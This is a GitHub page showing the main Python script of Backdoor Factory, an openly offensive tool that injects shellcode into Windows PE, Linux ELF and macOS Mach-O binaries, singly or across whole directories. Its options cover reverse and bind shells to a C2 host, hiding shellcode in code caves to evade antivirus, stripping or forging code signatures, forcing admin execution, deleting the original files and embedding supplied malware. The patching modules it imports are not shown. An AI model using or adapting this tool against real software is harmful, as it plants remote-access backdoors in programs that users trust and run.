Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
2 contributors

Users who have contributed to this file

@secretsquirrel @joshpitts-okta
executable file 619 lines (575 sloc) 30.6 KB
#!/usr/bin/env python2
'''
BackdoorFactory (BDF) v3 - FOUNTAINPATCH
Many thanks to Ryan O'Neill --ryan 'at' codeslum <d ot> org--
Without him, I would still be trying to do stupid things
with the elf format.
Also thanks to Silvio Cesare with his 1998 paper
(http://vxheaven.org/lib/vsc01.html) which these ELF patching
techniques are based on.
Special thanks to Travis Morrow for poking holes in my ideas.
Copyright (c) 2013-2017, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import sys
import os
import signal
import time
from random import choice
from optparse import OptionParser
from pebin import pebin
from elfbin import elfbin
from machobin import machobin
def signal_handler(signal, frame):
print '\nProgram Exit'
sys.exit(0)
class bdfMain():
version = """\
Version: 3.4.2
"""
author = """\
Author: Joshua Pitts
Email: the.midnite.runr[-at ]gmail<d o-t>com
Twitter: @midnite_runr
IRC: freenode.net #BDFactory
"""
#ASCII ART
menu = ["-.(`-') (`-') _ <-"
".(`-') _(`-') (`-')\n"
"__( OO) (OO ).-/ _ __( OO)"
"( (OO ).-> .-> .-> <-.(OO ) \n"
"'-'---.\ / ,---. \-,-----.'-'. ,--"
".\ .'_ (`-')----. (`-')----. ,------,) \n"
"| .-. (/ | \ /`.\ | .--./| .' /"
"'`'-..__)( OO).-. '( OO).-. '| /`. ' \n"
"| '-' `.) '-'|_.' | /_) (`-')| /)"
"| | ' |( _) | | |( _) | | || |_.' | \n"
"| /`'. |(| .-. | || |OO )| . ' |"
" | / : \| |)| | \| |)| || . .' \n"
"| '--' / | | | |(_' '--'\| |\ \|"
" '-' / ' '-' ' ' '-' '| |\ \ \n"
"`------' `--' `--' `-----'`--' '--'"
"`------' `-----' `-----' `--' '--' \n"
" (`-') _ (`-') "
" (`-') \n"
" <-. (OO ).-/ _ ( OO).-> "
" .-> <-.(OO ) .-> \n"
"(`-')-----./ ,---. \-,-----./ '._"
" (`-')----. ,------,) ,--.' ,-. \n"
"(OO|(_\---'| \ /`.\ | .--./|'--...__)"
"( OO).-. '| /`. '(`-')'.' / \n"
" / | '--. '-'|_.' | /_) (`-')`--. .--'"
"( _) | | || |_.' |(OO \ / \n"
" \_) .--'(| .-. | || |OO ) | | "
" \| |)| || . .' | / /) \n"
" `| |_) | | | |(_' '--'\ | | "
" ' '-' '| |\ \ `-/ /` \n"
" `--' `--' `--' `-----' `--' "
" `-----' `--' '--' `--' \n",
"__________ "
" __ .___ \n"
"\______ \_____ ____ "
"| | __ __| _/____ ___________ \n"
" | | _/\__ \ _/ ___\|"
" |/ // __ |/ _ \ / _ \_ __ \ \n"
" | | \ / __ \\\\ \__"
"_| </ /_/ ( <_> | <_> ) | \/\n"
" |______ /(____ /\___ >"
"__|_ \____ |\____/ \____/|__| \n"
" \/ \/ \/"
" \/ \/ \n"
"___________ "
"__ \n"
"\_ _____/____ _____/"
" |_ ___________ ___.__. \n"
" | __) \__ \ _/ ___\ "
" __\/ _ \_ __ < | | \n"
" | \ / __ \\\\ \__"
"_| | ( <_> ) | \/\___ | \n"
" \___ / (____ /\___ >_"
"_| \____/|__| / ____| \n"
" \/ \/ \/ "
" \/ \n",
" ____ ____ ______ "
" __ \n"
" / __ )/ __ \/ ____/___ "
"______/ /_____ _______ __\n"
" / __ / / / / /_ / __ `/"
" ___/ __/ __ \/ ___/ / / /\n"
" / /_/ / /_/ / __/ / /_/ /"
" /__/ /_/ /_/ / / / /_/ /\n"
"/_____/_____/_/ \__,_/"
"\___/\__/\____/_/ \__, /\n"
" "
" /____/\n"]
signal.signal(signal.SIGINT, signal_handler)
parser = OptionParser()
parser.add_option("-f", "--file", dest="FILE", action="store",
type="string",
help="File to backdoor")
parser.add_option("-s", "--shell", default="show", dest="SHELL",
action="store", type="string",
help="Payloads that are available for use."
" Use 'show' to see payloads."
)
parser.add_option("-H", "--hostip", default=None, dest="HOST",
action="store", type="string",
help="IP of the C2 for reverse connections.")
parser.add_option("-P", "--port", default=None, dest="PORT",
action="store", type="int",
help="The port to either connect back to for reverse "
"shells or to listen on for bind shells")
parser.add_option("-J", "--cave_jumping", dest="CAVE_JUMPING",
default=False, action="store_true",
help="Select this options if you want to use code cave"
" jumping to further hide your shellcode in the binary."
)
parser.add_option("-a", "--add_new_section", default=False,
dest="ADD_SECTION", action="store_true",
help="Mandating that a new section be added to the "
"exe (better success) but less av avoidance")
parser.add_option("-U", "--user_shellcode", default=None,
dest="SUPPLIED_SHELLCODE", action="store",
help="User supplied shellcode, make sure that it matches"
" the architecture that you are targeting."
)
parser.add_option("-c", "--cave", default=False, dest="FIND_CAVES",
action="store_true",
help="The cave flag will find code caves that "
"can be used for stashing shellcode. "
"This will print to all the code caves "
"of a specific size."
"The -l flag can be use with this setting.")
parser.add_option("-l", "--shell_length", default=380, dest="SHELL_LEN",
action="store", type="int",
help="For use with -c to help find code "
"caves of different sizes")
parser.add_option("-o", "--output-file", default=None, dest="OUTPUT",
action="store", type="string",
help="The backdoor output file")
parser.add_option("-n", "--section", default="sdata", dest="NSECTION",
action="store", type="string",
help="New section name must be "
"less than seven characters")
parser.add_option("-d", "--directory", dest="DIR", action="store",
type="string",
help="This is the location of the files that "
"you want to backdoor. "
"You can make a directory of file backdooring faster by "
"forcing the attaching of a codecave "
"to the exe by using the -a setting.")
parser.add_option("-w", "--change_access", default=True,
dest="CHANGE_ACCESS", action="store_false",
help="This flag changes the section that houses "
"the codecave to RWE. Sometimes this is necessary. "
"Enabled by default. If disabled, the "
"backdoor may fail.")
parser.add_option("-i", "--injector", default=False, dest="INJECTOR",
action="store_true",
help="This command turns the backdoor factory in a "
"hunt and shellcode inject type of mechanism. Edit "
"the target settings in the injector module.")
parser.add_option("-u", "--suffix", default=".old", dest="SUFFIX",
action="store", type="string",
help="For use with injector, places a suffix"
" on the original file for easy recovery")
parser.add_option("-D", "--delete_original", dest="DELETE_ORIGINAL",
default=False, action="store_true",
help="For use with injector module. This command"
" deletes the original file. Not for use in production "
"systems. *Author not responsible for stupid uses.*")
parser.add_option("-O", "--disk_offset", dest="DISK_OFFSET", default=0,
type="int", action="store",
help="Starting point on disk offset, in bytes. "
"Some authors want to obfuscate their on disk offset "
"to avoid reverse engineering, if you find one of those "
"files use this flag, after you find the offset.")
parser.add_option("-S", "--support_check", dest="SUPPORT_CHECK",
default=False, action="store_true",
help="To determine if the file is supported by BDF prior"
" to backdooring the file. For use by itself or with "
"verbose. This check happens automatically if the "
"backdooring is attempted."
)
parser.add_option("-M", "--cave-miner", dest="CAVE_MINER", default=False, action="store_true",
help="Future use, to help determine smallest shellcode possible in a PE file"
)
parser.add_option("-q", "--no_banner", dest="NO_BANNER", default=False, action="store_true",
help="Kills the banner."
)
parser.add_option("-v", "--verbose", default=False, dest="VERBOSE",
action="store_true",
help="For debug information output.")
parser.add_option("-T", "--image-type", dest="IMAGE_TYPE", default="ALL",
type='string',
action="store", help="ALL, x86, or x64 type binaries only. Default=ALL")
parser.add_option("-Z", "--zero_cert", dest="ZERO_CERT", default=True, action="store_false",
help="Allows for the overwriting of the pointer to the PE certificate table"
" effectively removing the certificate from the binary for all intents"
" and purposes."
)
parser.add_option("-R", "--runas_admin", dest="RUNAS_ADMIN", default=False, action="store_true",
help="EXPERIMENTAL "
"Checks the PE binaries for \'requestedExecutionLevel level=\"highestAvailable\"\'"
". If this string is included in the binary, it must run as system/admin. If not "
"in Support Check mode it will attmept to patch highestAvailable into the manifest "
"if requestedExecutionLevel entry exists."
)
parser.add_option("-L", "--patch_dll", dest="PATCH_DLL", default=True, action="store_false",
help="Use this setting if you DON'T want to patch DLLs. Patches by default."
)
parser.add_option("-F", "--fat_priority", dest="FAT_PRIORITY", default="x64", action="store",
help="For MACH-O format. If fat file, focus on which arch to patch. Default "
"is x64. To force x86 use -F x86, to force both archs use -F ALL."
)
parser.add_option("-B", "--beacon", dest="BEACON", default=15, action="store", type="int",
help="For payloads that have the ability to beacon out, set the time in secs"
)
parser.add_option("-m", "--patch-method", dest="PATCH_METHOD", default="manual", action="store",
type="string", help="Patching methods for PE files, 'manual','automatic', replace "
"and onionduke")
parser.add_option("-b", "--user_malware", dest="SUPPLIED_BINARY", default=None, action="store",
help="For onionduke. Provide your desired binary.")
parser.add_option("-X", "--xp_mode", dest="XP_MODE", default=False, action="store_true",
help="Default: DO NOT support for XP legacy machines, use -X to support XP"
". By default the binary will crash on XP machines (e.g. sandboxes)")
parser.add_option("-A", "--idt_in_cave", dest="IDT_IN_CAVE", default=False, action="store_true",
help="EXPERIMENTAL "
"By default a new Import Directory Table is created in a new section, "
"by calling this flag it will be put in a code cave. This can cause bianry "
"failure is some cases. Test on target binaries first."
)
parser.add_option("-C","--code_sign", dest="CODE_SIGN", default=False, action="store_true",
help="For those with codesigning certs wishing to sign PE binaries only. "
"Name your signing key and private key signingcert.cer and signingPrivateKey.pem "
"repectively in the certs directory it's up to you to obtain signing certs.")
parser.add_option("-p","--preprocess", dest="PREPROCESS", default=False, action="store_true",
help="To execute preprocessing scripts in the preprocess directory")
(options, args) = parser.parse_args()
def basicDiscovery(FILE):
macho_supported = ['\xcf\xfa\xed\xfe', '\xca\xfe\xba\xbe',
'\xce\xfa\xed\xfe',
]
testBinary = open(FILE, 'rb')
header = testBinary.read(4)
testBinary.close()
if 'MZ' in header:
return 'PE'
elif 'ELF' in header:
return 'ELF'
elif header in macho_supported:
return "MACHO"
else:
'Only support ELF, PE, and MACH-O file formats'
return None
if options.NO_BANNER is False:
print choice(menu)
print author
print version
time.sleep(.5)
else:
print "\t Backdoor Factory"
print author
print version
if options.DIR:
for root, subFolders, files in os.walk(options.DIR):
for _file in files:
options.FILE = os.path.join(root, _file)
if os.path.isdir(options.FILE) is True:
print "Directory found, continuing"
continue
is_supported = basicDiscovery(options.FILE)
if is_supported is "PE":
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.CAVE_MINER,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.RUNAS_ADMIN,
options.PATCH_DLL,
options.PATCH_METHOD,
options.SUPPLIED_BINARY,
options.XP_MODE,
options.IDT_IN_CAVE,
options.CODE_SIGN,
options.PREPROCESS,
)
elif is_supported is "ELF":
supported_file = elfbin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.FIND_CAVES,
options.SHELL_LEN,
options.SUPPLIED_SHELLCODE,
options.IMAGE_TYPE,
options.PREPROCESS,
)
elif is_supported is "MACHO":
supported_file = machobin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY,
options.BEACON,
options.PREPROCESS,
)
if options.SUPPORT_CHECK is True:
if os.path.isfile(options.FILE):
is_supported = False
print "file", options.FILE
try:
is_supported = supported_file.support_check()
except Exception, e:
is_supported = False
print 'Exception:', str(e), '%s' % options.FILE
if is_supported is False or is_supported is None:
print "%s is not supported." % options.FILE
#continue
else:
print "%s is supported." % options.FILE
# if supported_file.flItms['runas_admin'] is True:
# print "%s must be run as admin." % options.FILE
print "*" * 50
if options.SUPPORT_CHECK is True:
sys.exit()
print ("You are going to backdoor the following "
"items in the %s directory:"
% options.DIR)
dirlisting = os.listdir(options.DIR)
for item in dirlisting:
print " {0}".format(item)
answer = raw_input("Do you want to continue? (yes/no) ")
if 'yes' in answer.lower():
for item in dirlisting:
#print item
print "*" * 50
options.File = options.DIR + '/' + item
if os.path.isdir(options.FILE) is True:
print "Directory found, continuing"
continue
print ("backdooring file %s" % item)
result = None
is_supported = basicDiscovery(options.FILE)
try:
if is_supported is "PE":
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.CAVE_MINER,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.RUNAS_ADMIN,
options.PATCH_DLL,
options.PATCH_METHOD,
options.SUPPLIED_BINARY,
options.XP_MODE,
options.IDT_IN_CAVE,
options.CODE_SIGN,
options.PREPROCESS,
)
supported_file.OUTPUT = None
supported_file.output_options()
result = supported_file.patch_pe()
elif is_supported is "ELF":
supported_file = elfbin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.FIND_CAVES,
options.SHELL_LEN,
options.SUPPLIED_SHELLCODE,
options.IMAGE_TYPE,
options.PREPROCESS,
)
supported_file.OUTPUT = None
supported_file.output_options()
result = supported_file.patch_elf()
elif is_supported is "MACHO":
supported_file = machobin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY,
options.BEACON,
options.PREPROCESS,
)
supported_file.OUTPUT = None
supported_file.output_options()
result = supported_file.patch_macho()
if result is None:
print 'Not Supported. Continuing'
continue
else:
print ("[*] File {0} is in backdoored "
"directory".format(supported_file.FILE))
except Exception as e:
print "DIR ERROR", str(e)
else:
print("Goodbye")
sys.exit()
if options.INJECTOR is True:
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.CAVE_MINER,
options.DELETE_ORIGINAL,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.RUNAS_ADMIN,
options.PATCH_DLL,
options.PATCH_METHOD,
options.SUPPLIED_BINARY,
options.XP_MODE,
options.IDT_IN_CAVE,
options.CODE_SIGN,
options.PREPROCESS,
)
supported_file.injector()
sys.exit()
if not options.FILE:
parser.print_help()
sys.exit()
#OUTPUT = output_options(options.FILE, options.OUTPUT)
is_supported = basicDiscovery(options.FILE)
if is_supported is "PE":
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.CAVE_MINER,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.RUNAS_ADMIN,
options.PATCH_DLL,
options.PATCH_METHOD,
options.SUPPLIED_BINARY,
options.XP_MODE,
options.IDT_IN_CAVE,
options.CODE_SIGN,
options.PREPROCESS,
)
elif is_supported is "ELF":
supported_file = elfbin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.FIND_CAVES,
options.SHELL_LEN,
options.SUPPLIED_SHELLCODE,
options.IMAGE_TYPE,
options.PREPROCESS,
)
elif is_supported is "MACHO":
supported_file = machobin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY,
options.BEACON,
options.PREPROCESS,
)
else:
print "Not supported."
sys.exit()
result = supported_file.run_this()
if result is True and options.SUPPORT_CHECK is False and supported_file.OUTPUT is not None:
print "File {0} is in the 'backdoored' directory".format(os.path.basename(supported_file.OUTPUT))
#END BDF MAIN
if __name__ == "__main__":
bdfMain()
You can’t perform that action at this time.